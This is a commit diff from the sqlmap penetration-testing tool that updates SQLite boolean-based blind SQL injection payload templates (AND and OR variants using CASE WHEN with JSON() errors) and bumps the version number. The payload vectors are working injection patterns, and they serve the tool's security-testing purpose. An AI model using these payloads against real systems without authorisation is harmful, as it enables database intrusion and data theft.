sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-25 11:03:47 +03:00
Code Issues Packages Projects Releases Wiki Activity

Minor update of SQLite specific payload (#5501)

Browse Source
This commit is contained in:
Miroslav Stampar 2023-08-26 16:02:17 +02:00
parent 2f66aa8ac1
commit 6d472dc2b0
2 changed files with 25 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
data/xml/payloads/boolean_blind.xml
View File

@ -598,18 +598,37 @@ Tag: <test>
</test> </test>
<test> <test>
<title>SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (json)</title> <title>SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)</title>
<stype>1</stype> <stype>1</stype>
<level>1</level> <level>2</level>
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1</clause>
<where>1</where> <where>1</where>
<vector>AND CASE WHEN [INFERENCE] THEN 1 ELSE json('') END </vector> <vector>AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</vector>
<request> <request>
<payload>AND CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE json('') END</payload> <payload>AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</payload>
</request> </request>
<response> <response>
<comparison>AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE json('') END</comparison> <comparison>AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</comparison>
</response>
<details>
<dbms>SQLite</dbms>
</details>
</test>
<test>
<title>SQLite OR boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)</title>
<stype>1</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<where>2</where>
<vector>OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</vector>
<request>
<payload>OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</payload>
</request>
<response>
<comparison>OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END</comparison>
</response> </response>
<details> <details>
<dbms>SQLite</dbms> <dbms>SQLite</dbms>

2
lib/core/settings.py
View File

@ -20,7 +20,7 @@ from thirdparty import six
from thirdparty.six import unichr as _unichr from thirdparty.six import unichr as _unichr
# sqlmap version (<major>.<minor>.<month>.<monthly commit>) # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.7.8.8" VERSION = "1.7.8.9"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)